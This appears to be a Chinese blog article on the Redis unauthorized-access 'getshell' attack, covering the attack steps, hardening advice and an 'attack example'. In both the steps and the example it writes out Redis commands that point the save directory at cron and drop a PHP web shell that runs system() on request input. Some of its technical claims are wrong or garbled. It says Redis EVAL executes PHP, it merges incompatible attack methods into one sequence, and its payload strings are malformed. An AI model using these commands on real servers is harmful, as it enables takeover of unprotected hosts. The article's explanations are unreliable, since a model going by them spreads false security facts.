您的位置:

深入剖析redisgetshell

一、redisgetshell介绍

redisgetshell是一种利用Redis未授权访问漏洞,通过修改Redis配置文件或者通过Redis命令执行恶意代码达到控制服务器的攻击手段。redisgetshell攻击属于典型的内网攻击方式,攻击者可以通过局域网络内任意一台机器,在未进行严格安全设置的情况下,远程控制受害机器

在redisgetshell攻击中,攻击者一般会通过Redis的SET命令将攻击代码写入到Redis的某个键中,然后再利用Redis的EVAL命令执行代码。由于Redis是单线程的,且EVAL命令允许执行任意代码,因此攻击者可以通过Redis命令轻易地掌控服务器,并进一步通过上传/下载文件、开启网络服务等方式打开后门

二、redisgetshell攻击流程

redisgetshell攻击一般包括以下步骤:

1、获取未授权访问的Redis服务

2、修改Redis配置文件,将bind参数设置为0.0.0.0或注释掉参数,启用网络通信功能;或者直接通过Redis未授权访问漏洞获取Redis的操作权限

config set dir /var/spool/cron/
config set dbfilename root
set x "';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '
';die; }?>" config set dbfilename "backup.php" save

3、利用Redis的SET命令将攻击代码写入到Redis的某个键里

set payload ""

4、通过Redis的EVAL命令执行攻击代码

eval "phpinfo();"

5、进一步上传/下载文件、开启网络服务等方式打开后门

三、如何防范redisgetshell攻击

为了避免redisgetshell攻击,可以从以下几个方面进行防范:

1、设置Redis密码,避免未授权访问

2、禁用危险的Redis命令,如EVAL命令,避免攻击者通过Redis命令执行恶意代码

rename-command EVAL dummy

3、限制Redis服务的网络访问范围,避免外部服务器或恶意用户可以通过网络直接连接到Redis服务

4、定期更新Redis版本,及时修补已知漏洞

5、定期检查Redis服务的日志,发现异常及时进行处理

四、redisgetshell攻击实例

以下是一段实际的redisgetshell攻击代码示例:

config set dir /var/spool/cron/
config set dbfilename root
set x "';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '
';die; }?>" config set dbfilename "backup.php" save set payload "" eval "phpinfo();"

五、结语

redisgetshell攻击是一种典型的内网攻击手段,可以通过利用Redis未授权访问漏洞直接控制服务器。为了防范这种攻击方式,在平时的工作中,我们要定期检查Redis配置,避免存在安全漏洞;同时,在发布Redis服务时,需要设置管理员账号和密码,并限制服务的访问范围,防止被攻击者利用。